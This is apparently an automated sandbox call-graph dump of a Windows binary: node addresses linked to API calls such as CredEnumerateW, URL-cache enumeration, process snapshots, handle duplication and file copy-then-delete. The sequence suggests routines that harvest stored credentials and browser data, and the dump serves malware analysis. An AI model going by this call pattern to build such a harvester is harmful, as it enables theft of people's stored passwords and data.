40b04b 38257->38264 38260 40b04b ??3@YAXPAX 38259->38260 38261 40afd7 ??2@YAPAXI 38260->38261 38261->38253 38262->38255 38263->38257 38265 40b051 ??3@YAXPAX 38264->38265 38266 40b05f 38264->38266 38265->38266 38266->38248 38267->38131 38269 444a64 FreeLibrary 38268->38269 38270 444a83 38268->38270 38269->38270 38270->38133 38272 4032c4 38271->38272 38273 40b633 free 38272->38273 38274 403316 38273->38274 38291 44553b 38274->38291 38278 403480 38489 40368c 15 API calls 38278->38489 38280 403489 38281 40b633 free 38280->38281 38283 403495 38281->38283 38282 40333c 38282->38278 38284 4033a9 memset memcpy 38282->38284 38285 4033ec wcscmp 38282->38285 38487 4028e7 11 API calls 38282->38487 38488 40f508 6 API calls 38282->38488 38283->38133 38284->38282 38284->38285 38285->38282 38288 403421 _wcsicmp 38288->38282 38289->38133 38290->38134 38292 445548 38291->38292 38293 445599 38292->38293 38490 40c768 38292->38490 38294 4455a8 memset 38293->38294 38301 4457f2 38293->38301 38573 403988 38294->38573 38304 445854 38301->38304 38675 403e2d memset memset memset memset memset 38301->38675 38302 4455e5 38313 445672 38302->38313 38318 44560f 38302->38318 38303 4458bb memset memset 38306 414c2e 17 API calls 38303->38306 38357 4458aa 38304->38357 38698 403c9c memset memset memset memset memset 38304->38698 38309 4458f9 38306->38309 38308 44595e memset memset 38316 414c2e 17 API calls 38308->38316 38317 40b2cc 27 API calls 38309->38317 38311 44558c 38557 444b06 38311->38557 38312 44557a 38312->38311 38771 4136c0 CoTaskMemFree 38312->38771 38584 403fbe memset memset memset memset memset 38313->38584 38314 445a00 memset memset 38721 414c2e 38314->38721 38315 445b22 38321 445bca 38315->38321 38322 445b38 memset memset memset 38315->38322 38326 44599c 38316->38326 38328 445909 38317->38328 38330 4087b3 338 API calls 38318->38330 38320 445849 38787 40b1ab free free 38320->38787 38329 445c8b memset memset 38321->38329 38395 445cf0 38321->38395 38333 445bd4 38322->38333 38334 445b98 38322->38334 38327 40b2cc 27 API calls 38326->38327 38341 4459ac 38327->38341 38338 409d1f 6 API calls 38328->38338 38342 414c2e 17 API calls 38329->38342 38339 445621 38330->38339 38331 44589f 38788 40b1ab free free 38331->38788 38332 445585 38772 41366b FreeLibrary 38332->38772 38348 414c2e 17 API calls 38333->38348 38334->38333 38344 445ba2 38334->38344 38337 403335 38486 4452e5 45 API calls 38337->38486 38352 445919 38338->38352 38773 4454bf 20 API calls 38339->38773 38340 445823 38340->38320 38362 4087b3 338 API calls 38340->38362 38353 409d1f 6 API calls 38341->38353 38354 445cc9 38342->38354 38860 4099c6 wcslen 38344->38860 38345 4456b2 38775 40b1ab free free 38345->38775 38347 40b2cc 27 API calls 38358 445a4f 38347->38358 38349 445be2 38348->38349 38360 40b2cc 27 API calls 38349->38360 38350 445d3d 38380 40b2cc 27 API calls 38350->38380 38351 445d88 memset memset memset 38363 414c2e 17 API calls 38351->38363 38789 409b98 GetFileAttributesW 38352->38789 38364 4459bc 38353->38364 38365 409d1f 6 API calls 38354->38365 38355 445879 38355->38331 38376 4087b3 338 API calls 38355->38376 38357->38303 38381 44594a 38357->38381 38737 409d1f wcslen wcslen 38358->38737 38370 445bf3 38360->38370 38362->38340 38373 445dde 38363->38373 38856 409b98 GetFileAttributesW 38364->38856 38375 445ce1 38365->38375 38366 445bb3 38863 445403 memset 38366->38863 38367 445680 38367->38345 38607 4087b3 memset 38367->38607 38379 409d1f 6 API calls 38370->38379 38371 445928 38371->38381 38790 40b6ef 38371->38790 38382 40b2cc 27 API calls 38373->38382 38880 409b98 GetFileAttributesW 38375->38880 38376->38355 38378 40b2cc 27 API calls 38387 445a94 38378->38387 38389 445c07 38379->38389 38390 445d54 _wcsicmp 38380->38390 38381->38308 38394 4459ed 38381->38394 38393 445def 38382->38393 38383 4459cb 38383->38394 38403 40b6ef 253 API calls 38383->38403 38742 40ae18 38387->38742 38388 44566d 38388->38301 38658 413d4c 38388->38658 38399 445389 259 API calls 38389->38399 38400 445d71 38390->38400 38463 445d67 38390->38463 38392 445665 38774 40b1ab free free 38392->38774 38401 409d1f 6 API calls 38393->38401 38394->38314 38394->38315 38395->38337 38395->38350 38395->38351 38396 445389 259 API calls 38396->38321 38405 445c17 38399->38405 38881 445093 23 API calls 38400->38881 38408 445e03 38401->38408 38403->38394 38404 4456d8 38410 40b2cc 27 API calls 38404->38410 38411 40b2cc 27 API calls 38405->38411 38407 44563c 38407->38392 38413 4087b3 338 API calls 38407->38413 38882 409b98 GetFileAttributesW 38408->38882 38409 40b6ef 253 API calls 38409->38337 38415 4456e2 38410->38415 38416 445c23 38411->38416 38412 445d83 38412->38337 38413->38407 38776 413fa6 _wcsicmp _wcsicmp 38415->38776 38420 409d1f 6 API calls 38416->38420 38418 445e12 38424 445e6b 38418->38424 38431 40b2cc 27 API calls 38418->38431 38422 445c37 38420->38422 38421 4456eb 38427 4456fd memset memset memset memset 38421->38427 38428 4457ea 38421->38428 38429 445389 259 API calls 38422->38429 38423 445b17 38857 40aebe 38423->38857 38884 445093 23 API calls 38424->38884 38777 409c70 wcscpy wcsrchr 38427->38777 38780 413d29 38428->38780 38434 445c47 38429->38434 38435 445e33 38431->38435 38432 445e7e 38437 445f67 38432->38437 38440 40b2cc 27 API calls 38434->38440 38441 409d1f 6 API calls 38435->38441 38446 40b2cc 27 API calls 38437->38446 38438 445ab2 memset 38442 40b2cc 27 API calls 38438->38442 38444 445c53 38440->38444 38445 445e47 38441->38445 38447 445aa1 38442->38447 38443 409c70 2 API calls 38448 44577e 38443->38448 38449 409d1f 6 API calls 38444->38449 38883 409b98 GetFileAttributesW 38445->38883 38451 445f73 38446->38451 38447->38423 38447->38438 38452 409d1f 6 API calls 38447->38452 38749 40add4 38447->38749 38754 445389 38447->38754 38763 40ae51 38447->38763 38453 409c70 2 API calls 38448->38453 38454 445c67 38449->38454 38456 409d1f 6 API calls 38451->38456 38452->38447 38457 44578d 38453->38457 38458 445389 259 API calls 38454->38458 38455 445e56 38455->38424 38461 445e83 memset 38455->38461 38459 445f87 38456->38459 38457->38428 38465 40b2cc 27 API calls 38457->38465 38458->38321 38887 409b98 GetFileAttributesW 38459->38887 38464 40b2cc 27 API calls 38461->38464 38463->38337 38463->38409 38466 445eab 38464->38466 38467 4457a8 38465->38467 38468 409d1f 6 API calls 38466->38468 38469 409d1f 6 API calls 38467->38469 38470 445ebf 38468->38470 38471 4457b8 38469->38471 38472 40ae18 9 API calls 38470->38472 38779 409b98 GetFileAttributesW 38471->38779 38482 445ef5 38472->38482 38474 4457c7 38474->38428 38476 4087b3 338 API calls 38474->38476 38475 40ae51 9 API calls 38475->38482 38476->38428 38477 445f5c 38479 40aebe FindClose 38477->38479 38478 40add4 2 API calls 38478->38482 38479->38437 38480 40b2cc 27 API calls 38480->38482 38481 409d1f 6 API calls 38481->38482 38482->38475 38482->38477 38482->38478 38482->38480 38482->38481 38484 445f3a 38482->38484 38885 409b98 GetFileAttributesW 38482->38885 38886 445093 23 API calls 38484->38886 38486->38282 38487->38288 38488->38282 38489->38280 38491 40c775 38490->38491 38888 40b1ab free free 38491->38888 38493 40c788 38889 40b1ab free free 38493->38889 38495 40c790 38890 40b1ab free free 38495->38890 38497 40c798 38498 40aa04 free 38497->38498 38499 40c7a0 38498->38499 38891 40c274 memset 38499->38891 38504 40a8ab 9 API calls 38505 40c7c3 38504->38505 38506 40a8ab 9 API calls 38505->38506 38507 40c7d0 38506->38507 38920 40c3c3 38507->38920 38511 40c877 38520 40bdb0 38511->38520 38512 40c86c 38962 4053fe 39 API calls 38512->38962 38513 40c7e5 38513->38511 38513->38512 38519 40c634 50 API calls 38513->38519 38945 40a706 38513->38945 38519->38513 39245 404363 38520->39245 38523 40bf5d 39265 40440c 38523->39265 38524 40bdee 38524->38523 38528 40b2cc 27 API calls 38524->38528 38525 40bddf CredEnumerateW 38525->38524 38529 40be02 wcslen 38528->38529 38529->38523 38536 40be1e 38529->38536 38530 40be26 wcsncmp 38530->38536 38533 40be7d memset 38534 40bea7 memcpy 38533->38534 38533->38536 38535 40bf11 wcschr 38534->38535 38534->38536 38535->38536 38536->38523 38536->38530 38536->38533 38536->38534 38536->38535 38537 40b2cc 27 API calls 38536->38537 38539 40bf43 LocalFree 38536->38539 39268 40bd5d 28 API calls 38536->39268 39269 404423 38536->39269 38538 40bef6 _wcsnicmp 38537->38538 38538->38535 38538->38536 38539->38536 38540 4135f7 39284 4135e0 38540->39284 38543 40b2cc 27 API calls 38544 41360d 38543->38544 38545 40a804 8 API calls 38544->38545 38546 413613 38545->38546 38547 41361b 38546->38547 38548 41363e 38546->38548 38549 40b273 27 API calls 38547->38549 38550 4135e0 FreeLibrary 38548->38550 38551 413625 GetProcAddress 38549->38551 38552 413643 38550->38552 38551->38548 38553 413648 38551->38553 38552->38312 38554 413658 38553->38554 38555 4135e0 FreeLibrary 38553->38555 38554->38312 38556 413666 38555->38556 38556->38312 39287 4449b9 38557->39287 38560 444c1f 38560->38293 38561 4449b9 42 API calls 38563 444b4b 38561->38563 38562 444c15 38565 4449b9 42 API calls 38562->38565 38563->38562 39308 444972 GetVersionExW 38563->39308 38565->38560 38566 444b99 memcmp 38571 444b8c 38566->38571 38567 444c0b 39312 444a85 42 API calls 38567->39312 38571->38566 38571->38567 39309 444aa5 42 API calls 38571->39309 39310 40a7a0 GetVersionExW 38571->39310 39311 444a85 42 API calls 38571->39311 38574 40399d 38573->38574 39313 403a16 38574->39313 38576 403a09 39327 40b1ab free free 38576->39327 38578 403a12 wcsrchr 38578->38302 38579 4039a3 38579->38576 38582 4039f4 38579->38582 39324 40a02c CreateFileW 38579->39324 38582->38576 38583 4099c6 2 API calls 38582->38583 38583->38576 38585 414c2e 17 API calls 38584->38585 38586 404048 38585->38586 38587 414c2e 17 API calls 38586->38587 38588 404056 38587->38588 38589 409d1f 6 API calls 38588->38589 38590 404073 38589->38590 38591 409d1f 6 API calls 38590->38591 38592 40408e 38591->38592 38593 409d1f 6 API calls 38592->38593 38594 4040a6 38593->38594 38595 403af5 20 API calls 38594->38595 38596 4040ba 38595->38596 38597 403af5 20 API calls 38596->38597 38598 4040cb 38597->38598 39354 40414f memset 38598->39354 38600 404140 39368 40b1ab free free 38600->39368 38601 4040ec memset 38605 4040e0 38601->38605 38603 404148 38603->38367 38604 4099c6 2 API calls 38604->38605 38605->38600 38605->38601 38605->38604 38606 40a8ab 9 API calls 38605->38606 38606->38605 39381 40a6e6 WideCharToMultiByte 38607->39381 38609 4087ed 39382 4095d9 memset 38609->39382 38612 408809 memset memset memset memset memset 38613 40b2cc 27 API calls 38612->38613 38614 4088a1 38613->38614 38615 409d1f 6 API calls 38614->38615 38616 4088b1 38615->38616 38617 40b2cc 27 API calls 38616->38617 38618 4088c0 38617->38618 38619 409d1f 6 API calls 38618->38619 38620 4088d0 38619->38620 38621 40b2cc 27 API calls 38620->38621 38622 4088df 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 4088ef 38623->38624 38625 40b2cc 27 API calls 38624->38625 38626 4088fe 38625->38626 38627 409d1f 6 API calls 38626->38627 38639 408953 38639->38367 38659 40b633 free 38658->38659 38660 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38659->38660 38661 413f00 Process32NextW 38660->38661 38662 413da5 OpenProcess 38661->38662 38663 413f17 CloseHandle 38661->38663 38664 413eb0 38662->38664 38665 413df3 memset 38662->38665 38663->38404 38664->38661 38667 413ebf free 38664->38667 38668 4099f4 3 API calls 38664->38668 39807 413f27 38665->39807 38667->38664 38668->38664 38669 413e37 GetModuleHandleW 38671 413e46 GetProcAddress 38669->38671 38672 413e1f 38669->38672 38671->38672 38672->38669 39812 413959 38672->39812 39828 413ca4 38672->39828 38674 413ea2 CloseHandle 38674->38664 38676 414c2e 17 API calls 38675->38676 38677 403eb7 38676->38677 38678 414c2e 17 API calls 38677->38678 38679 403ec5 38678->38679 38680 409d1f 6 API calls 38679->38680 38681 403ee2 38680->38681 38682 409d1f 6 API calls 38681->38682 38683 403efd 38682->38683 38684 409d1f 6 API calls 38683->38684 38685 403f15 38684->38685 38686 403af5 20 API calls 38685->38686 38687 403f29 38686->38687 38688 403af5 20 API calls 38687->38688 38689 403f3a 38688->38689 38690 40414f 33 API calls 38689->38690 38696 403f4f 38690->38696 38691 403faf 39842 40b1ab free free 38691->39842 38693 403f5b memset 38693->38696 38694 403fb7 38694->38340 38695 4099c6 2 API calls 38695->38696 38696->38691 38696->38693 38696->38695 38697 40a8ab 9 API calls 38696->38697 38697->38696 38699 414c2e 17 API calls 38698->38699 38700 403d26 38699->38700 38701 414c2e 17 API calls 38700->38701 38702 403d34 38701->38702 38703 409d1f 6 API calls 38702->38703 38704 403d51 38703->38704 38705 409d1f 6 API calls 38704->38705 38706 403d6c 38705->38706 38707 409d1f 6 API calls 38706->38707 38708 403d84 38707->38708 38709 403af5 20 API calls 38708->38709 38710 403d98 38709->38710 38711 403af5 20 API calls 38710->38711 38712 403da9 38711->38712 38713 40414f 33 API calls 38712->38713 38718 403dbe 38713->38718 38714 403e1e 39843 40b1ab free free 38714->39843 38716 403dca memset 38716->38718 38717 403e26 38717->38355 38718->38714 38718->38716 38719 4099c6 2 API calls 38718->38719 38720 40a8ab 9 API calls 38718->38720 38719->38718 38720->38718 38722 414b81 9 API calls 38721->38722 38724 414c40 38722->38724 38723 414c73 memset 38726 414c94 38723->38726 38724->38723 39844 409cea 38724->39844 39847 414592 RegOpenKeyExW 38726->39847 38729 414c64 SHGetSpecialFolderPathW 38731 414d0b 38729->38731 38730 414cc1 38732 414cf4 wcscpy 38730->38732 39848 414bb0 wcscpy 38730->39848 38731->38347 38732->38731 38734 414cd2 39849 4145ac RegQueryValueExW 38734->39849 38736 414ce9 RegCloseKey 38736->38732 38738 409d62 38737->38738 38739 409d43 wcscpy 38737->38739 38738->38378 38740 409719 2 API calls 38739->38740 38741 409d51 wcscat 38740->38741 38741->38738 38743 40aebe FindClose 38742->38743 38744 40ae21 38743->38744 38745 4099c6 2 API calls 38744->38745 38746 40ae35 38745->38746 38747 409d1f 6 API calls 38746->38747 38748 40ae49 38747->38748 38748->38447 38750 40ade0 38749->38750 38753 40ae0f 38749->38753 38751 40ade7 wcscmp 38750->38751 38750->38753 38752 40adfe wcscmp 38751->38752 38751->38753 38752->38753 38753->38447 38755 40ae18 9 API calls 38754->38755 38760 4453c4 38755->38760 38756 40ae51 9 API calls 38756->38760 38757 4453f3 38759 40aebe FindClose 38757->38759 38758 40add4 2 API calls 38758->38760 38761 4453fe 38759->38761 38760->38756 38760->38757 38760->38758 38762 445403 254 API calls 38760->38762 38761->38447 38762->38760 38764 40ae7b FindNextFileW 38763->38764 38765 40ae5c FindFirstFileW 38763->38765 38766 40ae94 38764->38766 38767 40ae8f 38764->38767 38765->38766 38769 40aeb6 38766->38769 38770 409d1f 6 API calls 38766->38770 38768 40aebe FindClose 38767->38768 38768->38766 38769->38447 38770->38769 38771->38332 38772->38311 38773->38407 38774->38388 38775->38388 38776->38421 38778 409c89 38777->38778 38778->38443 38779->38474 38781 413d39 38780->38781 38782 413d2f FreeLibrary 38780->38782 38783 40b633 free 38781->38783 38782->38781 38784 413d42 38783->38784 38785 40b633 free 38784->38785 38786 413d4a 38785->38786 38786->38301 38787->38304 38788->38357 38789->38371 38791 44db70 38790->38791 38792 40b6fc memset 38791->38792 38793 409c70 2 API calls 38792->38793 38794 40b732 wcsrchr 38793->38794 38795 40b743 38794->38795 38796 40b746 memset 38794->38796 38795->38796 38797 40b2cc 27 API calls 38796->38797 38798 40b76f 38797->38798 38799 409d1f 6 API calls 38798->38799 38800 40b783 38799->38800 39850 409b98 GetFileAttributesW 38800->39850 38802 40b792 38803 40b7c2 38802->38803 38804 409c70 2 API calls 38802->38804 39851 40bb98 38803->39851 38806 40b7a5 38804->38806 38808 40b2cc 27 API calls 38806->38808 38812 40b7b2 38808->38812 38809 40b837 CloseHandle 38811 40b83e memset 38809->38811 38810 40b817 38813 409a45 3 API calls 38810->38813 39884 40a6e6 WideCharToMultiByte 38811->39884 38815 409d1f 6 API calls 38812->38815 38816 40b827 CopyFileW 38813->38816 38815->38803 38816->38811 38817 40b866 38818 444432 121 API calls 38817->38818 38820 40b879 38818->38820 38819 40bad5 38822 40baeb 38819->38822 38823 40bade DeleteFileW 38819->38823 38820->38819 38821 40b273 27 API calls 38820->38821 38824 40b89a 38821->38824 38825 40b04b ??3@YAXPAX 38822->38825 38823->38822 38826 438552 134 API calls 38824->38826 38827 40baf3 38825->38827 38828 40b8a4 38826->38828 38827->38381 38829 40bacd 38828->38829 38831 4251c4 137 API calls 38828->38831 38830 443d90 111 API calls 38829->38830 38830->38819 38854 40b8b8 38831->38854 38832 40bac6 39894 424f26 123 API calls 38832->39894 38833 40b8bd memset 39885 425413 17 API calls 38833->39885 38836 425413 17 API calls 38836->38854 38839 40a71b MultiByteToWideChar 38839->38854 38840 40a734 MultiByteToWideChar 38840->38854 38843 40b9b5 memcmp 38843->38854 38844 4099c6 2 API calls 38844->38854 38845 404423 38 API calls 38845->38854 38848 40bb3e memset memcpy 39895 40a734 MultiByteToWideChar 38848->39895 38849 4251c4 137 API calls 38849->38854 38851 40bb88 LocalFree 38851->38854 38854->38832 38854->38833 38854->38836 38854->38839 38854->38840 38854->38843 38854->38844 38854->38845 38854->38848 38854->38849 38855 40ba5f memcmp 38854->38855 39886 4253ef 16 API calls 38854->39886 39887 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38854->39887 39888 4253af 17 API calls 38854->39888 39889 4253cf 17 API calls 38854->39889 39890 447280 memset 38854->39890 39891 447960 memset memcpy memcpy memcpy 38854->39891 39892 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38854->39892 39893 447920 memcpy memcpy memcpy 38854->39893 38855->38854 38856->38383 38858 40aed1 38857->38858 38859 40aec7 FindClose 38857->38859 38858->38315 38859->38858 38861 4099d7 38860->38861 38862 4099da memcpy 38860->38862 38861->38862 38862->38366 38864 40b2cc 27 API calls 38863->38864 38865 44543f 38864->38865 38866 409d1f 6 API calls 38865->38866 38867 44544f 38866->38867 39979 409b98 GetFileAttributesW 38867->39979 38869 44545e 38870 445476 38869->38870 38871 40b6ef 253 API calls 38869->38871 38872 40b2cc 27 API calls 38870->38872 38871->38870 38873 445482 38872->38873 38874 409d1f 6 API calls 38873->38874 38875 445492 38874->38875 39980 409b98 GetFileAttributesW 38875->39980 38877 4454a1 38878 4454b9 38877->38878 38879 40b6ef 253 API calls 38877->38879 38878->38396 38879->38878 38880->38395 38881->38412 38882->38418 38883->38455 38884->38432 38885->38482 38886->38482 38887->38463 38888->38493 38889->38495 38890->38497 38892 414c2e 17 API calls 38891->38892 38893 40c2ae 38892->38893 38963 40c1d3 38893->38963 38898 40c3be 38915 40a8ab 38898->38915 38899 40afcf 2 API calls 38900 40c2fd FindFirstUrlCacheEntryW 38899->38900 38901 40c3b6 38900->38901 38902 40c31e wcschr 38900->38902 38903 40b04b ??3@YAXPAX 38901->38903 38904 40c331 38902->38904 38905 40c35e FindNextUrlCacheEntryW 38902->38905 38903->38898 38907 40a8ab 9 API calls 38904->38907 38905->38902 38906 40c373 GetLastError 38905->38906 38908 40c3ad FindCloseUrlCache 38906->38908 38909 40c37e 38906->38909 38910 40c33e wcschr 38907->38910 38908->38901 38911 40afcf 2 API calls 38909->38911 38910->38905 38912 40c34f 38910->38912 38913 40c391 FindNextUrlCacheEntryW 38911->38913 38914 40a8ab 9 API calls 38912->38914 38913->38902 38913->38908 38914->38905 39172 40a97a 38915->39172 38918 40a8cc 38918->38504 38919 40a8d0 7 API calls 38919->38918 39177 40b1ab free free 38920->39177 38922 40c3dd 38923 40b2cc 27 API calls 38922->38923 38924 40c3e7 38923->38924 39178 414592 RegOpenKeyExW 38924->39178 38926 40c3f4 38927 40c50e 38926->38927 38928 40c3ff 38926->38928 38942 405337 38927->38942 38929 40a9ce 4 API calls 38928->38929 38930 40c418 memset 38929->38930 39179 40aa1d 38930->39179 38933 40c471 38935 40c47a _wcsupr 38933->38935 38934 40c505 RegCloseKey 38934->38927 38936 40a8d0 7 API calls 38935->38936 38937 40c498 38936->38937 38938 40a8d0 7 API calls 38937->38938 38939 40c4ac memset 38938->38939 38940 40aa1d 38939->38940 38941 40c4e4 RegEnumValueW 38940->38941 38941->38934 38941->38935 39181 405220 38942->39181 38946 4099c6 2 API calls 38945->38946 38947 40a714 _wcslwr 38946->38947 38948 40c634 38947->38948 39238 405361 38948->39238 38951 40c65c wcslen 39241 4053b6 39 API calls 38951->39241 38952 40c71d wcslen 38952->38513 38954 40c677 38955 40c713 38954->38955 39242 40538b 39 API calls 38954->39242 39244 4053df 39 API calls 38955->39244 38958 40c6a5 38958->38955 38959 40c6a9 memset 38958->38959 38960 40c6d3 38959->38960 39243 40c589 44 API calls 38960->39243 38962->38511 38964 40ae18 9 API calls 38963->38964 38970 40c210 38964->38970 38965 40ae51 9 API calls 38965->38970 38966 40c264 38967 40aebe FindClose 38966->38967 38969 40c26f 38967->38969 38968 40add4 2 API calls 38968->38970 38975 40e5ed memset memset 38969->38975 38970->38965 38970->38966 38970->38968 38971 40c231 _wcsicmp 38970->38971 38972 40c1d3 35 API calls 38970->38972 38971->38970 38973 40c248 38971->38973 38972->38970 38988 40c084 22 API calls 38973->38988 38976 414c2e 17 API calls 38975->38976 38977 40e63f 38976->38977 38978 409d1f 6 API calls 38977->38978 38979 40e658 38978->38979 38989 409b98 GetFileAttributesW 38979->38989 38981 40e667 38982 40e680 38981->38982 38983 409d1f 6 API calls 38981->38983 38990 409b98 GetFileAttributesW 38982->38990 38983->38982 38985 40e68f 38986 40c2d8 38985->38986 38991 40e4b2 38985->38991 38986->38898 38986->38899 38988->38970 38989->38981 38990->38985 39012 40e01e 38991->39012 38993 40e593 38994 40e5b0 38993->38994 38995 40e59c DeleteFileW 38993->38995 38996 40b04b ??3@YAXPAX 38994->38996 38995->38994 38998 40e5bb 38996->38998 38997 40e521 38997->38993 39035 40e175 38997->39035 39000 40e5c4 CloseHandle 38998->39000 39001 40e5cc 38998->39001 39000->39001 39003 40b633 free 39001->39003 39002 40e573 39004 40e584 39002->39004 39005 40e57c CloseHandle 39002->39005 39006 40e5db 39003->39006 39078 40b1ab free free 39004->39078 39005->39004 39008 40b633 free 39006->39008 39009 40e5e3 39008->39009 39009->38986 39011 40e540 39011->39002 39055 40e2ab 39011->39055 39079 406214 39012->39079 39015 40e16b 39015->38997 39018 40afcf 2 API calls 39019 40e08d OpenProcess 39018->39019 39020 40e0a4 GetCurrentProcess DuplicateHandle 39019->39020 39024 40e152 39019->39024 39021 40e0d0 GetFileSize 39020->39021 39022 40e14a CloseHandle 39020->39022 39115 409a45 GetTempPathW 39021->39115 39022->39024 39023 40e160 39027 40b04b ??3@YAXPAX 39023->39027 39024->39023 39026 406214 22 API calls 39024->39026 39026->39023 39027->39015 39028 40e0ea 39118 4096dc CreateFileW 39028->39118 39030 40e0f1 CreateFileMappingW 39031 40e140 CloseHandle CloseHandle 39030->39031 39032 40e10b MapViewOfFile 39030->39032 39031->39022 39033 40e13b CloseHandle 39032->39033 39034 40e11f WriteFile UnmapViewOfFile 39032->39034 39033->39031 39034->39033 39036 40e18c 39035->39036 39119 406b90 39036->39119 39039 40e1a7 memset 39045 40e1e8 39039->39045 39040 40e299 39151 4069a3 39040->39151 39046 40e283 39045->39046 39047 40dd50 _wcsicmp 39045->39047 39053 40e244 _snwprintf 39045->39053 39129 406e8f 39045->39129 39158 40742e 8 API calls 39045->39158 39159 40aae3 wcslen wcslen _memicmp 39045->39159 39160 406b53 SetFilePointerEx ReadFile 39045->39160 39048 40e291 39046->39048 39049 40e288 free 39046->39049 39047->39045 39050 40aa04 free 39048->39050 39049->39048 39050->39040 39054 40a8d0 7 API calls 39053->39054 39054->39045 39056 40e2c2 39055->39056 39057 406b90 11 API calls 39056->39057 39058 40e2d3 39057->39058 39059 40e4a0 39058->39059 39061 406e8f 13 API calls 39058->39061 39064 40e489 39058->39064 39067 40dd50 _wcsicmp 39058->39067 39073 40e3e0 memcpy 39058->39073 39074 40e3fb memcpy 39058->39074 39075 40e3b3 wcschr 39058->39075 39076 40e416 memcpy 39058->39076 39077 40e431 memcpy 39058->39077 39161 40dd50 _wcsicmp 39058->39161 39170 40742e 8 API calls 39058->39170 39171 406b53 SetFilePointerEx ReadFile 39058->39171 39060 4069a3 2 API calls 39059->39060 39062 40e4ab 39060->39062 39061->39058 39062->39011 39065 40aa04 free 39064->39065 39066 40e491 39065->39066 39066->39059 39068 40e497 free 39066->39068 39067->39058 39068->39059 39070 40e376 memset 39162 40aa29 39070->39162 39073->39058 39074->39058 39075->39058 39076->39058 39077->39058 39078->38993 39080 406294 CloseHandle 39079->39080 39081 406224 39080->39081 39082 4096c3 CreateFileW 39081->39082 39083 40622d 39082->39083 39084 406281 GetLastError 39083->39084 39085 40a2ef ReadFile 39083->39085 39087 40625a 39084->39087 39086 406244 39085->39086 39086->39084 39088 40624b 39086->39088 39087->39015 39090 40dd85 memset 39087->39090 39088->39087 39089 406777 19 API calls 39088->39089 39089->39087 39091 409bca GetModuleFileNameW 39090->39091 39092 40ddbe CreateFileW 39091->39092 39095 40ddf1 39092->39095 39093 40afcf ??2@YAPAXI ??3@YAXPAX 39093->39095 39094 41352f 9 API calls 39094->39095 39095->39093 39095->39094 39096 40de0b NtQuerySystemInformation 39095->39096 39097 40de3b CloseHandle GetCurrentProcessId 39095->39097 39096->39095 39098 40de54 39097->39098 39099 413d4c 46 API calls 39098->39099 39107 40de88 39099->39107 39100 40e00c 39101 413d29 free FreeLibrary 39100->39101 39102 40e014 39101->39102 39102->39015 39102->39018 39103 40dea9 _wcsicmp 39104 40dee7 OpenProcess 39103->39104 39105 40debd _wcsicmp 39103->39105 39104->39107 39105->39104 39106 40ded0 _wcsicmp 39105->39106 39106->39104 39106->39107 39107->39100 39107->39103 39108 40dfef CloseHandle 39107->39108 39109 40df78 39107->39109 39110 40df23 GetCurrentProcess DuplicateHandle 39107->39110 39113 40df8f CloseHandle 39107->39113 39108->39107 39109->39108 39109->39113 39114 40dfae _wcsicmp 39109->39114 39110->39107 39111 40df4c memset 39110->39111 39112 41352f 9 API calls 39111->39112 39112->39107 39113->39109 39114->39107 39114->39109 39116 409a74 GetTempFileNameW 39115->39116 39117 409a66 GetWindowsDirectoryW 39115->39117 39116->39028 39117->39116 39118->39030 39120 406bd5 39119->39120 39121 406bad 39119->39121 39123 4066bf free malloc memcpy free free 39120->39123 39128 406c0f 39120->39128 39121->39120 39122 406bba _wcsicmp 39121->39122 39122->39120 39122->39121 39124 406be5 39123->39124 39125 40afcf ??2@YAPAXI ??3@YAXPAX 39124->39125 39124->39128 39126 406bff 39125->39126 39127 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39126->39127 39127->39128 39128->39039 39128->39040 39131 406ed1 39129->39131 39130 407424 39130->39045 39131->39130 39132 40b633 free 39131->39132 39140 406f4e 39132->39140 39133 406f73 memset 39133->39140 39134 407080 free 39134->39140 39135 40718b 39137 4069df memcpy 39135->39137 39149 40730b 39135->39149 39136 4099f4 malloc memcpy free 39136->39140 39150 4071f1 39137->39150 39138 4069df memcpy 39138->39140 39139 4069df memcpy 39142 4070d4 39139->39142 39140->39133 39140->39134 39140->39136 39140->39138 39141 406aa2 memcpy 39140->39141 39140->39142 39143 406a10 memcpy 39140->39143 39141->39140 39142->39130 39142->39135 39142->39139 39145 40717b 39142->39145 39143->39140 39144 4069df memcpy 39144->39150 39146 4069df memcpy 39145->39146 39146->39135 39147 406c5a 6 API calls 39147->39149 39148 406c28 ??2@YAPAXI ??3@YAXPAX 39148->39149 39149->39130 39149->39147 39149->39148 39150->39144 39150->39149 39152 4069c4 ??3@YAXPAX 39151->39152 39153 4069af 39152->39153 39154 40b633 free 39153->39154 39155 4069ba 39154->39155 39156 40b04b ??3@YAXPAX 39155->39156 39157 4069c2 39156->39157 39157->39011 39158->39045 39159->39045 39160->39045 39161->39070 39163 40aa33 39162->39163 39164 40aa63 39162->39164 39165 40aa44 39163->39165 39166 40aa38 wcslen 39163->39166 39164->39058 39167 40a9ce malloc memcpy free free 39165->39167 39166->39165 39168 40aa4d 39167->39168 39168->39164 39169 40aa51 memcpy 39168->39169 39169->39164 39170->39058 39171->39058 39176 40a980 39172->39176 39173 40a8bb 39173->38918 39173->38919 39174 40a995 _wcsicmp 39174->39176 39175 40a99c wcscmp 39175->39176 39176->39173 39176->39174 39176->39175 39177->38922 39178->38926 39180 40aa23 RegEnumValueW 39179->39180 39180->38933 39180->38934 39182 405335 39181->39182 39183 40522a 39181->39183 39182->38513 39184 40b2cc 27 API calls 39183->39184 39185 405234 39184->39185 39186 40a804 8 API calls 39185->39186 39187 40523a 39186->39187 39226 40b273 39187->39226 39189 405248 _mbscpy _mbscat GetProcAddress 39190 40b273 27 API calls 39189->39190 39191 405279 39190->39191 39229 405211 GetProcAddress 39191->39229 39193 405282 39194 40b273 27 API calls 39193->39194 39195 40528f 39194->39195 39230 405211 GetProcAddress 39195->39230 39197 405298 39198 40b273 27 API calls 39197->39198 39199 4052a5 39198->39199 39231 405211 GetProcAddress 39199->39231 39201 4052ae 39202 40b273 27 API calls 39201->39202 39203 4052bb 39202->39203 39232 405211 GetProcAddress 39203->39232 39205 4052c4 39206 40b273 27 API calls 39205->39206 39207 4052d1 39206->39207 39233 405211 GetProcAddress 39207->39233 39209 4052da 39210 40b273 27 API calls 39209->39210 39211 4052e7 39210->39211 39234 405211 GetProcAddress 39211->39234 39213 4052f0 39214 40b273 27 API calls 39213->39214 39215 4052fd 39214->39215 39235 405211 GetProcAddress 39215->39235 39217 405306 39218 40b273 27 API calls 39217->39218 